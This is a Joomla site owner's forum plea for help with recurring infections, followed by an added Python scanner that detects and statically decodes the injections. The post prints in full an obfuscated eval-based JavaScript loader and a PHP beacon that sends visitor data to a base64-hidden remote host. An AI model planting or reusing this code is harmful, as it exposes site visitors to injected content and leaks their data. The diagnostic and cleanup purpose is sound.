I've done various projects using the Joomla content management system. Lately I'm facing significant trouble with my new projects. It appears to be an adware and spyware attack. As you may already know, the Joomla CMS always puts a blank HTML file named 'index.html' in every single folder. Also, the majority of Joomla modules have a file named default.php inside the tmpl folder. I believe it's adware and spyware. It is inserting some JavaScript and PHP code into my index.html files and tmpl->default.php files.

The code is the following. Code present in the index.html file inside every directory:

<!-- o --><script>try{document.getElementById('qwe').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.5t57t20t20.5t29.5t4.5t4.5t62.5t16t50.5t54t57.5t50.5t16t61.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t59.5t57t52.5t58t50.5t20t17t30t52.5t51t57t48.5t54.5t50.5t16t57.5t57t49.5t30.5t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t16t59.5t52.5t50t58t52t30.5t19.5t24.5t24t19.5t16t52t50.5t52.5t51.5t52t58t30.5t19.5t24.5t24t19.5t16t57.5t58t60.5t54t50.5t30.5t19.5t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t29t52t52.5t50t50t50.5t55t29.5t56t55.5t57.5t52.5t58t52.5t55.5t55t29t48.5t49t57.5t55.5t54t58.5t58t50.5t29.5t54t50.5t51t58t29t24t29.5t58t55.5t56t29t24t29.5t19.5t31t30t23.5t52.5t51t57t48.5t54.5t50.5t31t17t20.5t29.5t4.5t4.5t62.5t4.5t4.5t51t58.5t55t49.5t58t52.5t55.5t55t16t52.5t51t57t48.5t54.5t50.5t57t20t20.5t61.5t4.5t4.5t4.5t59t48.5t57t16t51t16t30.5t16t50t55.5t49.5t58.5t54.5t50.5t55t58t23t49.5t57t50.5t48.5t58t50.5t34.5t54t50.5t54.5t50.5t55t58t20t19.5t52.5t51t57t48.5t54.5t50.5t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t57.5t57t49.5t19.5t22t19.5t52t58t58t56t29t23.5t23.5t51t52.5t49t50.5t57t48.5t57.5t58t48.5t58t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t58t23t56t52t56t19.5t20.5t29.5t51t23t57.5t58t60.5t54t50.5t23t59t52.5t57.5t52.5t49t52.5t54t52.5t58t60.5t30.5t19.5t52t52.5t50t50t50.5t55t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t56t55.5t57.5t52.5t58t52.5t55.5t55t30.5t19.5t48.5t49t57.5t55.5t54t58.5t58t50.5t19.5t29.5t51t23t57.5t58t60.
5t54t50.5t23t54t50.5t51t58t30.5t19.5t24t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t58t55.5t56t30.5t19.5t24t19.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t59.5t52.5t50t58t52t19.5t22t19.5t24.5t24t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t52t50.5t52.5t51.5t52t58t19.5t22t19.5t24.5t24t19.5t20.5t29.5t4.5t4.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.5t45.5t24t46.5t23t48.5t56t56t50.5t55t50t33.5t52t52.5t54t50t20t51t20.5t29.5t4.5t4.5t62.5';n=n['split'](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"[i]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script><!-- c -->

This is the PHP code found inside module title->tmpl->default.php, the template's index.php, and footer.php.

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

I attempted to get rid of them on many occasions and re-submitted the files. But nonetheless my sites are going down within 2 or 3 days. The local copy of the index.html file shows up as a virus in Microsoft Security Essentials and some others like NOD32. How do I escape from this? Please suggest possible solutions and recovery.

Thanks

Note: every time I clean these files I usually change my FTP password. So don't spend your time saying "update the FTP password". I already attempted it. :-/
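
For triage of the two injections quoted above, here is an added example (not part of the original post) that walks a site tree, flags files carrying either signature, and decodes the hidden strings statically, without executing the JavaScript or PHP. The directory names, `mod_example` and the `example.invalid` URL are constructed placeholders; the signatures and the multiply-by-2 decoding are read off the quoted snippets.

```python
import base64
import re
import tempfile
from pathlib import Path

# Signatures taken from the two injected snippets quoted in the post.
JS_SIG = re.compile(r"<!-- o --><script>.*?n='([0-9.t]+)'.*?</script><!-- c -->", re.S)
PHP_SIG = re.compile(r"\$sRetry\b.*?base64_decode\(\s*'([A-Za-z0-9+/=]+)'", re.S)

def decode_js_numbers(blob):
    # The script sets h = (ddd - d2) * -1 = -2 and calls fromCharCode(-h * n[i]),
    # so every 't'-separated number is half of a character code.
    return "".join(chr(round(float(v) * 2)) for v in blob.split("t") if v)

def scan(root):
    """Map each injected file (relative path) to (kind, statically decoded text)."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in {".html", ".htm", ".php"}:
            continue
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        if m := JS_SIG.search(text):
            hits[rel] = ("js", decode_js_numbers(m.group(1)))
        elif m := PHP_SIG.search(text):
            hits[rel] = ("php", base64.b64decode(m.group(1)).decode("latin-1"))
    return hits

def demo():
    """Scan a constructed tree: one clean file, two files with placeholder payloads."""
    js_text, url = "PLACEHOLDER-SCRIPT", "http://example.invalid/stat.php"
    enc = "t".join(str(ord(c) / 2) for c in js_text)
    b64 = base64.b64encode(url.encode()).decode()
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        tmpl = root / "modules" / "mod_example" / "tmpl"
        tmpl.mkdir(parents=True)
        (root / "images").mkdir()
        (root / "images" / "index.html").write_text("<html><body></body></html>")
        (root / "index.html").write_text(
            f"<html></html><!-- o --><script>t='t';n='{enc}';</script><!-- c -->")
        (tmpl / "default.php").write_text(
            f"<?php if (!isset($sRetry)) {{ global $sRetry; "
            f"$l = base64_decode( '{b64}'); }} ?>\n<div>module</div>")
        return scan(root)

if __name__ == "__main__":
    for name, (kind, decoded) in demo().items():
        print(f"{kind:4} {name}: {decoded!r}")
```

Run `scan()` against an offline copy of the site rather than the live web root, and compare the flagged files with a clean Joomla package of the same version before restoring anything.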